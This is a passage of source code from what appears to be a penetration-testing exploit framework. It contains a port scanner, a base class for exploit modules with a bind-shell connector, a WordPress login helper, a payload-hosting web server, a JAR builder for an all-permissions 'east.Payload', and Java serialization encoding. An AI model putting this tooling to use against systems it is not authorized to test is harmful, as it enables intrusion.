_attach(module["PATH"]+module["NAME"], module, main_dict)
else:
_attach(module["NAME"], module, main_dict)
return main_dict
def is_module_in_trunk(trunk, name):
index = 0
for index, module in enumerate(trunk):
if module["NAME"] == name:
return True, index
return False, index
================================================
FILE: core/OptionsParser.py
================================================
from collections import OrderedDict
class OptionsParser:
def __init__(self):
pass
def parse_data(self, data):
res = {}
for entry in data:
if entry['value']['type'] == 'int':
if 'value' in entry['value'] and entry['value']['value']:
res[entry['option']] = int(entry['value']['value'])
elif entry['value']['type'] == 'list':
res[entry['option']] = entry['value']['selected']
elif entry['value']['type'] == 'bool':
res[entry['option']] = entry['value']['value']
else:
if 'value' in entry['value'] and entry['value']['value']:
res[entry['option']] = entry['value']['value']
return res
def prepare_options(self, options):
res = OrderedDict()
for option in options:
value = options[option]
ext_options = {}
# check for extended options
if type(value) is tuple:
if len(value) > 1 and type(value[1] is dict):
ext_options = value[1]
value = value[0]
if type(value) is int:
res[option] = dict(type="int", value=value)
elif type(value) is bool:
res[option] = dict(type="bool", value=value)
elif type(value) is dict:
res[option] = value
res[option]["type"] = "list"
else:
res[option] = dict(type="string", value=value)
res[option].update(ext_options)
return res
================================================
FILE: core/PortScannerMT.py
================================================
from __future__ import print_function
import socket
import sys
import threading
import Queue
class ScannerThread(threading.Thread):
def __init__(self, inq, outq):
threading.Thread.__init__(self)
# queues for (host, port)
self.setDaemon(True)
self.inq = inq
self.outq = outq
self.killed = False
def run(self):
while not self.killed:
host, port = self.inq.get()
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to the given host:port
sd.connect((host, port))
except socket.error:
# set the CLOSED flag
self.outq.put((host, port, 'CLOSED'))
else:
self.outq.put((host, port, 'OPEN'))
sd.close()
class Scanner:
def __init__(self, from_port, to_port, host='localhost'):
"""
Used for scanning ports
@param from_port(int): Beginning to scan from this port
@param to_port(int): Ending scan with this port
@param host(string): Host address
"""
self.from_port = from_port
self.to_port = to_port
self.host = host
self.scanners = []
self.resp = []
def check_port_state(self, port):
sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sd.connect(('127.0.0.1', int(port)))
sd.close()
return True
except socket.error:
sd.close()
return False
def scan(self, search_for='opened',first_match=False, nthreads=1, send_fn=None, exclude=[]):
"""
@param search_for(string): Search for 'opened', 'closed' or 'all' ports
@param first_match(bool): If True returns only first scan result and stoping scanning
@param nthreads(int): Number of threads
@param send_fn(function): Callback to send results data
@param exclude(list(int)): Ports not to be to scanned
@return(list): list of tuples(host, port, status)
"""
self.resp = []
if self.from_port>self.to_port:
print ("'from port' must be smaller than 'to port'")
return
toscan = Queue.Queue()
scanned = Queue.Queue()
self.scanners = [ScannerThread(toscan, scanned) for i in range(nthreads)]
for scanner in self.scanners:
scanner.start()
hostports = [(self.host, port) for port in xrange(self.from_port, self.to_port+1) if port not in exclude]
for hostport in hostports:
toscan.put(hostport)
results = {}
for host, port in hostports:
while (host, port) not in results:
nhost, nport, nstatus = scanned.get()
results[(nhost, nport)] = nstatus
status = results[(host, port)]
value = (host, port, status)
if status == 'OPEN' and search_for.lower() == 'opened':
self.resp.append(value)
if send_fn:
send_fn(value)
if first_match:
return self._finish_scan()
continue
elif status == 'CLOSED' and search_for.lower() == 'closed':
self.resp.append(value)
if send_fn:
send_fn(value)
if first_match:
return self._finish_scan()
elif search_for.lower() == 'all':
self.resp.append(value)
if send_fn:
send_fn(value)
if first_match:
return self._finish_scan()
return self._finish_scan()
def _finish_scan(self):
for scanner in self.scanners:
scanner.join(0.001)
scanner.killed = True
return self.resp
if __name__ == '__main__':
callback = lambda x: print(x)
scanner = Scanner(5000, 6000, "localhost")
scanner.scan(search_for='closed', first_match=False, nthreads=100, send_fn=callback)
================================================
FILE: core/ReportGenerator.py
================================================
import os
import time
class ReportGenerator:
def __init__(self):
self.path_to_templates = os.getcwd() + "/data/report_templates/"
self.start_date_time = time.strftime("%d %b %Y %H-%M-%S")
self.succeeded_count = 0
self.failed_count = 0
self.categories = {}
self.report_name = self.generate_report()
def _generate_content(self, module):
content = self.read_file_content(self.path_to_templates + "row_template.html")
options = ""
listener = ""
if module["OPTIONS"]:
options += "<div class=\"entry\">Module options:</div>"
for option, value in module["OPTIONS"].iteritems():
if option == "listener":
listener += "<div class=\"entry\">Listener enabled with options:</div>"
for l_option, l_value in module["OPTIONS"]["listener"].iteritems():
listener += "{option}: {value}".format(option=l_option, value=l_value)
listener += "<br>"
continue
options += "{option}: {value}".format(option=option, value=value)
options += "<br>"
content = content.format(MODULE_NAME=str(module["NAME"]),
DESCRIPTION=str(module["DESCRIPTION"]),
NOTES=str(module["NOTES"]),
LOG=("<br>".join(m.time + ":" + m.message for m in module["LOG"])).encode('utf-8'),
IS_SHELL_CONNECTED=str(module["IS_SHELL_CONNECTED"]),
CVE=str(module["CVE"]),
CLASS="succeeded" if module["RESULT"] else "failed",
IS_SUCCESS="Succeeded" if module["RESULT"] else "Failed",
OPTIONS=str(options),
LISTENER=str(listener))
if module["RESULT"]:
self.succeeded_count += 1
else:
self.failed_count += 1
category = module["PATH"].replace("/", "").capitalize()
if category in self.categories:
self.categories[category].append(content)
else:
self.categories[category] = [content]
def append_module(self, module):
self._generate_content(module)
self._rewrite_report()
def generate_report(self):
path = os.getcwd() + "/Reports"
if not os.path.exists(path):
os.mkdir(path)
name = path + "/" + self.start_date_time + ".html"
with open(name, "w") as f:
f.write("")
return name
def read_file_content(self, filename):
content = ""
with open(filename, 'r') as f:
content = f.read()
return content
def _rewrite_report(self):
contents= ""
index = 1
for category_name in self.categories:
contents += "<div class='categoryName'>{}.) <a href='#{}'>{}</a></div>".format(index, category_name.lower(), category_name)
index += 1
contents += "<br>"
for category_name, category in self.categories.iteritems():
contents += "<div id='"+ category_name.lower()+"'><div class='categoryName'>"+ category_name + "(" + str(len(category)) + ")" + "</div>"
contents += "\n".join(category)
contents += "</div>"
common = self.read_file_content(self.path_to_templates + "common.html")
with open(self.report_name, 'w') as f:
f.write(common % (self.start_date_time, self.succeeded_count, self.failed_count, contents))
================================================
FILE: core/ServiceMessagesHandler.py
================================================
from itertools import groupby
class ServiceMessageLevel:
DEBUG = 1
INFO = 2
WARNING = 3
ERROR = 4
class ServiceMessageType:
IMPORT = 1
UPDATES = 2
class ServiceMessage:
def __init__(self, message, message_type, level, **kwargs):
self.message = message
self.message_type = message_type
self.level = level
self.module_to_import = kwargs.get('module_to_import')
self.module_with_unknown_import = kwargs.get('module_with_unknown_import')
def serialize(self):
return self.__dict__
class ServiceMessagesHandler:
def __init__(self):
self.messages = []
def reset(self):
self.messages = []
def remove_import_error(self, library_name):
self.messages = filter(lambda x: x.module_to_import != library_name, self.messages)
def get_grouped(self):
from collections import defaultdict
messages = []
messages_by_import = defaultdict(list)
for message in self.messages:
if message.message_type == ServiceMessageType.IMPORT:
messages_by_import[message.module_to_import].append((message.module_with_unknown_import))
else:
messages.append(message.serialize())
map_fn = lambda x: dict(message='Modules %s require python module %s' % (', '.join(x[1]), x[0]),
message_type=ServiceMessageType.IMPORT,
module_to_import=x[0],
level=ServiceMessageLevel.ERROR,
installed=False
)
messages_by_import = map(map_fn, messages_by_import.items())
return messages + messages_by_import
def serialize(self):
return [message.serialize() for message in self.messages]
def add_message(self, message, message_type=ServiceMessageType.IMPORT, level=ServiceMessageLevel.ERROR, **kwargs):
msg = ServiceMessage(message, message_type, level, **kwargs)
if msg.serialize() in self.serialize():
return
self.messages.append(ServiceMessage(message, message_type, level, **kwargs))
def get_messages(self, message_type=None, level=None):
msgs = filter(lambda item: (item.message_type == message_type if message_type else True)
and (item.level == level if level else True), self.messages)
return [msg.serialize() for msg in msgs]
================================================
FILE: core/Sploit.py
================================================
#!/usr/bin/env python
import sys
import traceback
import time
import os
import json
import logging
import socket
import base64
from random import choice
from string import ascii_letters
from string import digits
from websocket import create_connection
sys.path.append("./../core")
from Commands import APIClient
PORT = 49999
HOST = "127.0.0.1"
# simple common exception handler for method run
def _deco(self, func):
def wrapper():
try:
res = func()
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
self.log(''.join(traceback.format_exception(exc_type, exc_value, exc_traceback)))
self.finish(False)
# res = None
# self.logger.exception(e)
# self.log(e)
# self.finish(False)
return res
return wrapper
class Sploit:
"""
This is the base class for all exploits in the tool.
"""
def __init__(self, logfile="", debugfile="", logger=None, options={}):
# Logger will need in the future to log to file
"""
Initialization routines.
"""
# Module name
self.name = ""
self.__module_name = sys.argv[-1]
# PID of running module
self.pid = os.getpid()
self.logger = logging.getLogger()
self.logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(filename)s - %(asctime)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('Logs/exploits.log')
fh.setLevel(logging.INFO)
fh.setFormatter(formatter)
self.logger.addHandler(fh)
self.connection = create_connection("ws://%s:%s" % (HOST, PORT),
sockopt=((socket.IPPROTO_TCP, socket.TCP_NODELAY, 1),))
self.API_COMMANDS_HANDLER = APIClient(self.connection)
self.hello()
self.run = _deco(self, self.run)
if bool(options):
self.create_args(options)
def create_args(self, options={}):
self.args = self.args(options)
for o in options:
var = o.lower().replace(" ", "_")
var_val = self.args.get(o, options[o])
setattr(self, var, var_val)
return
def args(self, options={}):
"""
This function get required options from server.
"""
resp = self.API_COMMANDS_HANDLER.send_command('get_module_args', module_name=self.__module_name)
return resp
def get_listener_options(self):
"""
:return: Listener options from server
"""
resp = self.API_COMMANDS_HANDLER.send_command('get_listener_options', module_name=self.__module_name)
return resp
def check(self):
"""
This function is checking the response banner to verify that
target is vulnerable or not.
"""
return
def run(self):
"""
The main function that does all of the magic.
It returns 0 on failed and 1 on success.
"""
return
def logImage(self, image):
"""Sends image to GUI's log window
:param image: (Stream)
:return:
Usage:
1) with open('example.jpg', 'rb') as f:
image = f.read()
self.log(image)
2) image = urllib2.urlopen('http://blablabla/image.jpg').read()
self.log(image)
"""
image = base64.b64encode(image)
try:
self.send_message(image, msg_type="image")
except Exception as e:
self.logger.exception(e)
return
def log(self, message='', inline=False, replace=False):
"""
This function provides necessary routines
for logging any results of the exploit.
:param message: Message to log
:param inline: Prints log inline
:param replace: Replace last log message
"""
try:
self.send_message(message, inline=inline, replace=replace)
except Exception as e:
self.logger.exception(e)
print e
return
def finish(self, is_successful):
"""
Finishes module execution
Args:
is_successful: (bool) If True - module succeeded, False - module failed
"""
if is_successful:
msg = "Module %s was succeeded" % self.name
else:
msg = "Module %s was failed" % self.name
self.send_message(msg, is_successful)
sys.exit()
def writefile(self, filedata, filename=""):
"""
Save the result of the
exploit if the results are too large to print or if the aim
of the exploit is to steal some info or download the file.
Args:
filedata: (string) Contents of file
filename: (string) Filename
"""
dirname = "./OUTPUTS/" + self.name
if not filename:
filename = "response_" + time.strftime("%b_%d_ %Y_%H-%M-%S", time.gmtime()) + ".html"
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except Exception as e:
"""
! The kind of error sould be
managed with respect to
os version or type...
"""
self.logger.error(
"An error has occured during creating the directory '%s' : <%s>"
% (dirname, str(sys.exc_info()[1]))
)
return 0
filepath = dirname + "/" + filename
fd = file(filepath, "wb+")
try:
fd.write(filedata)
except Exception:
self.logger.error("An error has occured during writing output : <%s>" % (str(sys.exc_info()[1])))
return 0
fd.close()
self.log("wrote to %s" % filepath)
return 1
def connect_to_remote_shell(self, target_ip, target_port):
"""
Use this method to connect to bind paylod
Args:
target_ip: IP address of target
target_port: PORT of bind payload
"""
import subprocess
from Commands import FW_ROOT_PATH
bind_shell_path = os.path.join(FW_ROOT_PATH, 'listener', 'bind_connector.py')
self.API_COMMANDS_HANDLER.send_command('add_listener_options', module_name=self.__module_name,
options=dict(HOST=target_ip, PORT=target_port))
listener_process = subprocess.Popen([sys.executable, bind_shell_path, self.__module_name], shell=False, env=os.environ.copy())
self.API_COMMANDS_HANDLER.send_command('add_listener_pid', module_name=self.__module_name, pid=listener_process.pid)
def send_message(self, message, is_successful=None, inline=False, replace=False, msg_type="text"):
self.logger.debug(message)
self.API_COMMANDS_HANDLER.send_command('register_module_message', module_name=self.__module_name,
message=str(message), state=is_successful,
inline=inline, replace=replace, type=msg_type)
if is_successful is not None:
self.connection.close()
def is_listener_connected(self):
"""
Check listener state
:return: True - if shell is connected to listener
False - if shell is not connected to listener
None - if listener is not available
"""
time.sleep(1) # for limiting requests
resp = self.API_COMMANDS_HANDLER.send_command('is_listener_connected', module_name=self.__module_name)
return resp.get('state')
def hello(self):
self.API_COMMANDS_HANDLER.hello(self.__module_name, 'module')
def random_string(self, size=6, chars=ascii_letters + digits):
# you can change chars to digits or specify your string value
return ''.join(choice(chars) for _ in range(size))
if __name__ == "__main__":
s = Sploit()
s.log("123")
================================================
FILE: core/WebHelper.py
================================================
import mimetypes
import os
import time
import cookielib
import urllib2
import urllib
import threading
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import shutil
class FormPoster:
def __init__(self):
self.BOUNDARY = '----------ThIs_Is_tHe_saLteD_bouNdaRY_$'
self.fields = []
self.files = []
def post(self, target, additional_headers={}):
"""
Post fields and files to an http target as multipart/form-data.
additional_headers can add new headers or overwrite existing.
Return the server's response page.
"""
request = urllib2.Request(target)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0')
content_type, body = self._encode_multipart_formdata()
request.add_header('Content-Type', content_type)
request.add_header('Content-Length', str(len(body)))
if type(additional_headers) is dict:
for key in additional_headers:
request.add_header(key, additional_headers[key])
request.add_data(body)
return request
def _encode_multipart_formdata(self):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, filename, value) elements for data to be uploaded as files
Return (content_type, body)
"""
CRLF = '\r\n'
L = []
for (key, value) in self.fields:
L.append('--' + self.BOUNDARY)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
for (key, filename, value, content_type) in self.files:
L.append('--' + self.BOUNDARY)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
if content_type:
L.append('Content-Type: %s' % content_type)
L.append('')
L.append(value)
L.append('--' + self.BOUNDARY + '--')
L.append('')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=%s' % self.BOUNDARY
return content_type, body
def add_field(self, key, value):
self.fields.append((key, value))
def add_file(self, key, filename, file, is_path=True, content_type=''):
"""Add file entry to a form.
If 'is_path' - True 'file' must be path to file
If 'is_path' - False 'file' - is text content
"""
file = open(file, 'rb').read() if is_path else file
self.files.append((key, filename, file, content_type))
class NoRedirection(urllib2.HTTPErrorProcessor):
""" Creates no redirection handler
For example:
no_redir = NoRedirection()
print no_redir.open_http_address("http://habr.ru").geturl()
"""
def http_response(self, request, response):
return response
def open_http_address(self, address):
cj = cookielib.CookieJar()
opener = urllib2.build_opener(NoRedirection, urllib2.HTTPCookieProcessor(cj))
response = opener.open(address)
return response
https_response = http_response
def wordpress_auth(host, username, password):
"""Returns opener and cookie
Example:
opener, cookie = wordpress_auth('http://www.wordpresssite.com', 'guest', 'guest')
res = opener.open('http://www.wordpresssite.com/wp-admin/profile.php')
"""
cookie = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'DNT': '1'
}
payload = {
'log': username,
'pwd': password,
'wp-submit': 'Log+In',
'rememberme': 'forever',
'redirect_to': host+'wp-admin',
'testcookie': '1'
}
if host[-1] != '/' and host[-1] != '\\':
host += '/'
login_url = host + 'wp-login.php'
payload = urllib.urlencode(payload)
httpReq = urllib2.Request(login_url, payload, headers)
page = opener.open(httpReq)
return opener, cookie
class SimpleWebServerHandler(BaseHTTPRequestHandler):
CONTENT = ""
def do_GET(self):
self.send_response(200)
if 'admin.php' in self.path:
self.wfile.write(self.CONTENT)
self.wfile.write('')
class AdavancedHttpServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.path = os.path.normpath(self.path)
if self.path in self.server.files_for_share:
self.send_response(200)
local_file_path = self.server.files_for_share.get(self.path)
mime = mimetypes.guess_type(local_file_path)
if not mime:
mime = "plain/text"
# self.download_file(local_file_path)
# return
self.send_header('Content-Type', mime[0])
for header, value in self.server.custom_headers.items():
self.send_header(header, value)
self.end_headers()
with open(local_file_path, 'rb') as f:
self.wfile.write(f.read())
else:
self.send_error(404, "File not found")
def download_file(self, filename):
with open(filename, 'rb') as f:
self.send_response(200)
self.send_header("Content-Type", 'application/octet-stream')
self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(filename)))
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs.st_size))
self.end_headers()
shutil.copyfileobj(f, self.wfile)
class SimpleWebServer:
def __init__(self, host, port):
"""Simple http server. You can add local files to show them in web.
Example:
server = SimpleWebServer('localhost', 8080)
server.add_file_for_share("new1123.html", "<h1>HTML FILE TEST</h1>")
server.add_folder_for_share("E:\\work\\EaST")
server.add_header("CustomHeader", "CustomValue")
server.start_serve()
time.sleep(10)
server.stop_serve() # Kill the server
"""
self.host = host
self.port = port
self.httpd = None
self.thread = None
self.temp_dir = ""
self.headers = {}
self.files = {}
self.create_temp_folder()
def set_headers(self, headers={}):
self.headers = headers
def add_header(self, key, value):
self.headers[key] = value
def create_temp_folder(self):
try:
self.temp_dir = os.path.join(os.getcwd(), "tmp", "Webserver"+time.strftime('%Y%m%d%H%M%S', time.gmtime()))
os.makedirs(self.temp_dir)
except Exception as e:
self.temp_dir = ""
print str(e)
def add_file_for_share(self, filename, content, server_path=''):
"""
Add local file for share it to the web
:param filename:(string) Filename
:param content:(string) File content
:param server_path:(string) '/' - means server root
"""
if server_path == "/" or server_path == "\\":
server_path = ""
if server_path.startswith("/") or server_path.startswith("\\"):
server_path = server_path[1:]
full_server_filepath = os.path.join(server_path, filename)
path = os.path.join(self.temp_dir, server_path)
if not os.path.exists(path):
os.makedirs(path)
with open(os.path.join(self.temp_dir, full_server_filepath), 'wb') as f:
f.write(content)
local_path = os.path.normpath(os.path.join(self.temp_dir, full_server_filepath))
full_server_filepath = os.path.normpath("/" + full_server_filepath)
self.files[full_server_filepath] = local_path
def add_folder_for_share(self, local_path):
"""
Add all files from chosen folder and subfolders
:param local_path: (string) Local folder path
"""
local_path = os.path.normpath(local_path)
for path, dirs, files in os.walk(local_path):
for file in files:
local_file_path = os.path.join(path, file)
server_file_path = local_file_path.replace(local_path, '')
self.files[server_file_path] = local_file_path
def start_serve(self):
self.stop_serve()
try:
self.httpd = HTTPServer((self.host, self.port), AdavancedHttpServerHandler)
setattr(self.httpd, "files_for_share", self.files)
setattr(self.httpd, "custom_headers", self.headers)
self.thread = threading.Thread(target=self.httpd.serve_forever, args=())
self.thread.start()
return (True, "OK")
except Exception as e:
return (False, e)
def start_with_content(self, content):
self.stop_serve()
try:
self.httpd = HTTPServer((self.host, self.port), SimpleWebServerHandler)
SimpleWebServerHandler.CONTENT = content
self.thread = threading.Thread(target=self.httpd.serve_forever, args=())
self.thread.start()
return (True, "OK")
except Exception as e:
return (False, e)
def stop_serve(self):
if self.httpd:
self.httpd.shutdown()
if self.thread:
self.thread.join()
if __name__ == '__main__':
pass
================================================
FILE: core/WebSocketServer.py
================================================
# -*- coding: UTF-8 -*-
import Queue
import asyncore
import errno
import json
import logging
import struct
from StringIO import StringIO
from base64 import b64encode
from hashlib import sha1
from mimetools import Message
import os
import signal
import socket
from threading import Thread
import sys
from Commands import Commands
FIN = 0x80
OPCODE = 0x0f
MASKED = 0x80
PAYLOAD_LEN = 0x7f
PAYLOAD_LEN_EXT16 = 0x7e
PAYLOAD_LEN_EXT64 = 0x7f
OPCODE_TEXT = 0x01
CLOSE_CONN = 0x8
class ClientTypes:
ui = "ui"
module = "module"
listener = "listener"
class WebSocketServer(asyncore.dispatcher):
"""Receives connections and establishes handlers for each client.
"""
def __init__(self, host, port, connections):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.address = self.socket.getsockname()
self.listen(connections)
self.clients = {}
self.all_processes = []
self.command_handler = Commands(self)
def handle_accept(self):
# Called when a client connects to our socket
socket, details = self.accept()
self.clients[socket] = WebsocketHandler(sock=socket, server=self)
def handle_close(self):
self.close()
def add_process(self, pid):
self.all_processes.append(pid)
def remove_process(self, pid):
if pid in self.all_processes:
self.all_processes.remove(pid)
try:
os.kill(pid, signal.SIGTERM)
except:
pass
def kill_all_processes(self):
for client in self.clients.values():
client.close()
for pid in self.all_processes:
try:
os.kill(pid, signal.SIGTERM)
except:
pass
self.close()
sys.exit(1)
def get_client_by_name_and_type(self, name, client_type=ClientTypes.listener):
for client in self.clients.values():
if client.name == name and client.type == client_type:
return client
return None
def send_message_to_listener(self, name, message):
client = self.get_client_by_name_and_type(name)
if client:
client.send_message(message)
def send_message_to_all_uis(self, message):
ui_clients = [client for client in self.clients.values() if client.type == ClientTypes.ui]
for client in ui_clients:
client.send_message(message)
class WebsocketHandler(asyncore.dispatcher):
"""Handles echoing messages from a single client.
"""
magic = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
def __init__(self, sock, server=None):
self.name = ""
self.type = ""
self.server = server
self.handshake_done = False
self.keep_alive = True
self.valid_client = False
self.data_to_write = Queue.Queue()
self.logger = logging.getLogger(__name__)
asyncore.dispatcher.__init__(self, sock=sock)
return
def writable(self):
"""Call handle_write only if data_to_write is not empty"""
return not self.data_to_write.empty()
def readable(self):
"""Call handle_read only if connection is keep_alive"""
return self.keep_alive
def handle_write(self):
"""Write as much as possible of the most recent message we have received."""
data = self.data_to_write.get()
self.send(data)
def send_message(self, message):
message = json_encode(message)
self.data_to_write.put(chr(129))
length = len(message)
if length <= 125:
self.data_to_write.put(chr(length))
elif 126 <= length <= 65535:
self.data_to_write.put(chr(126))
self.data_to_write.put(struct.pack(">H", length))
else:
self.data_to_write.put(chr(127))
self.data_to_write.put(struct.pack(">Q", length))
self.data_to_write.put(message)
def handle_read(self):
"""Read an incoming message from the client"""
if not self.handshake_done:
self.handshake()
elif self.valid_client:
self.read_next_message()
def handshake(self):
data = self.recv(1024).strip()
new_data = data.split('\r\n', 1)
if not new_data:
return
headers = Message(StringIO(data.split('\r\n', 1)[1]))
if headers.get("Upgrade", None).lower() == "websocket":
key = headers['Sec-WebSocket-Key']
digest = b64encode(sha1(key + self.magic).hexdigest().decode('hex'))
response = 'HTTP/1.1 101 Switching Protocols\r\n'
response += 'Upgrade: websocket\r\n'
response += 'Connection: Upgrade\r\n'
response += 'Sec-WebSocket-Accept: %s\r\n\r\n' % digest
self.send(response)
self.handshake_done = True
self.valid_client = True
def read_bytes_splitted(self, num):
try:
bytes = self.read_bytes(num)
except socket.error as error:
if error.errno == errno.WSAECONNRESET:
return (None, None)
return map(ord, bytes)
def read_bytes(self, num):
data = self.buffer[:num]
self.buffer = self.buffer[num:]
return data
def recv_all(self, chunk=4096):
buffer = []
while 1:
try:
data = self.recv(chunk)
if not data:
break
buffer.append(data)
except socket.error, e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
# There is no data
break
return "".join(buffer)
def read_next_message(self):
try:
self.buffer = self.recv_all()
except socket.error as error:
if error.errno == errno.WSAECONNRESET:
pass
try:
b1, b2 = self.read_bytes_splitted(2)
except:
self.keep_alive = False
return
if not b1:
self.keep_alive = False
return
opcode = b1 & OPCODE
masked = b2 & MASKED
payload_length = b2 & PAYLOAD_LEN
if opcode == CLOSE_CONN:
self.keep_alive = False
return
if not masked:
self.keep_alive = False
return
if payload_length == 126:
payload_length = struct.unpack(">H", self.read_bytes(2))[0]
elif payload_length == 127:
payload_length = struct.unpack(">Q", self.read_bytes(8))[0]
masks = self.read_bytes_splitted(4)
decoded = ""
for char in self.read_bytes_splitted(payload_length):
char ^= masks[len(decoded) % 4]
decoded += chr(char)
self.on_message(decoded)
def on_message(self, message):
message = parse_json(message)
if not message:
return
# Check for hello
if "hello" in message:
self.hello(message["hello"], message['uuid'])
return
self.server.command_handler.execute(message, self)
def hello(self, args, uuid):
"""After connection to server client must do handshake sending its name and type
Params:
args: (dict)
args["name"]: (String)
args["type"]: (String) 'module', 'listener' or 'ui'
"""
name = self.check_and_make_unique_name(args["name"])
type = args["type"]
self.type = type
self.name = name
self.logger.info("Hello," + self.name)
self.send_message(dict(command="on_callback", uuid=uuid))
def check_and_make_unique_name(self, name, suffix=1):
names = [client.name for client in self.server.clients.values()]
if name not in names:
return name
new_name = "%s(%s)" % (name, suffix)
if new_name in names:
suffix += 1
return self.check_and_make_unique_name(name, suffix)
else:
return name
def handle_close(self):
self.close()
if self.socket in self.server.clients:
del self.server.clients[self.socket]
def parse_json(message):
if not message:
return None
try:
data = json.loads(message)
except Exception, e:
print(e)
logging.getLogger(__name__).exception(e)
return None
return data
def json_encode(message):
if not message:
return message
try:
data = json.dumps(message)
except Exception, e:
print(e)
logging.getLogger(__name__).exception(e)
return None
return data
if __name__ == '__main__':
import socket
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
host, port = ('', 49999) # let the kernel give us a port
server = WebSocketServer(host, port, 1000)
asyncore.loop()
================================================
FILE: core/__init__.py
================================================
================================================
FILE: core/helpers/__init__.py
================================================
================================================
FILE: core/helpers/archieve/__init__.py
================================================
================================================
FILE: core/helpers/archieve/jar.py
================================================
from zip import Zip
import os
class Jar(Zip):
def __init__(self, filename=''):
Zip.__init__(self, filename)
self.manifest = self.get_manifest()
self.is_manifest_created = False
def get_manifest(self, main_class='east.Payload'):
manifest = 'Manifest-Version: 1.0\n'
manifest += 'Main-Class: %s\n' % main_class
manifest += 'Permissions: all-permissions\n\n'
return manifest
def add_file(self, name, content='', write_to_manifest=True):
Zip.add_file(self, name, content)
if write_to_manifest:
self.__add_file_to_manifest(name)
def __add_file_to_manifest(self, filename):
self.manifest += "Name: {filename}\n\n".format(filename=filename)
def create_manifest(self):
self.add_file("META-INF/MANIFEST.MF", self.manifest, write_to_manifest=False)
self.is_manifest_created = True
def get_raw(self, remove_temp=False):
if not self.is_manifest_created:
self.create_manifest()
if not self.name:
print('You should create jar file before get raw content')
with open(self.name, 'rb') as f:
content = f.read()
if remove_temp:
os.remove(self.name)
return content
def get_jar(self):
if not self.is_manifest_created:
self.create_manifest()
return self.name
================================================
FILE: core/helpers/archieve/zip.py
================================================
import zipfile
import os
class Zip:
def __init__(self, filename=''):
self.name = filename
self.files = []
if filename:
self.create_archieve(filename)
def create_archieve(self, filename):
if not self.name:
self.name = filename
zf = zipfile.ZipFile(filename, 'w')
zf.close()
def add_file(self, name, content=''):
if not self.is_valid(name):
return
zf = zipfile.ZipFile(self.name, 'a')
if content:
zf.writestr(name, content)
else:
zf.write(name)
zf.close()
self.files
def is_valid(self, filename=''):
if not self.name:
raise Exception("Error. Zip archieve is not created.")
return False
if not zipfile.is_zipfile(self.name):
raise Exception("Error. File {name} is not zip archieve.".format(name=self.name))
return False
if filename and filename in self.files:
raise Exception("Error. There is file with the same name.")
return False
return True
================================================
FILE: core/helpers/java/Serialization.py
================================================
import struct
class Constants:
STREAM_MAGIC = 0xaced
STREAM_VERSION = 5
TC_NULL = 0x70
TC_REFERENCE = 0x71
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_STRING = 0x74
TC_ARRAY = 0x75
TC_CLASS = 0x76
TC_BLOCKDATA = 0x77
TC_ENDBLOCKDATA = 0x78
TC_RESET = 0x79
TC_BLOCKDATALONG = 0x7A
TC_EXCEPTION = 0x7B
TC_LONGSTRING = 0x7C
TC_PROXYCLASSDESC = 0x7D
TC_ENUM = 0x7E
BASE_WIRE_HANDLE = 0x7E0000
PRIMITIVE_TYPE_CODES = {
'B': 'byte',
'C': 'char',
'D': 'double',
'F': 'float',
'I': 'int',
'J': 'long',
'S': 'short',
'Z': 'boolean'
}
OBJECT_TYPE_CODES = {
'[': 'array',
'L': 'object'
}
TYPE_CODES = {}
TYPE_CODES.update(PRIMITIVE_TYPE_CODES)
TYPE_CODES.update(OBJECT_TYPE_CODES)
SC_WRITE_METHOD = 0x01 # if SC_SERIALIZABLE
SC_BLOCK_DATA = 0x08 # if SC_EXTERNALIZABLE
SC_SERIALIZABLE = 0x02
SC_EXTERNALIZABLE = 0x04
SC_ENUM = 0x10
class Element:
def __init__(self, stream=""):
self.stream = stream
def decode(self, io):
return self
def encode(self):
return ''
def __str__(self):
return self.__class__.__name__
class Annotation(Element):
def __init__(self, stream=None):
Element.__init__(self, stream)
self.contents = []
def decode(self, io):
while True:
content = decode_content(io, self.stream)
self.contents.append(content)
if content.__class__ is EndBlockData:
return self
return self
def encode(self):
if not self.contents:
raise Exception('Failed to serialize Annotation with empty contents')
encoded = ''
for content in self.contents:
encoded += encode_content(content)
return encoded
def __str__(self):
str = '['
data = [content.__str__() for content in self.contents]
str += ', '.join(data)
str += ']'
return str
class BlockData(Element):
def __init__(self, stream=None, contents=''):
Element.__init__(self, stream)
self.contents = contents
self.length = len(contents)
def decode(self, io):
raw_length = io.read(1)
if not raw_length:
raise Exception('Failed to unserialize BlockData')
self.length = struct.unpack('>B', raw_length)[0]
if self.length == 0:
self.contents = ''
else:
self.contents = io.read(self.length)
if not self.contents or len(self.contents) != self.length:
raise Exception('Failed to unserialize BlockData')
return self
def encode(self):
encoded = struct.pack(">B", self.length)
encoded += self.contents
return encoded
def __str__(self):
ret = '['
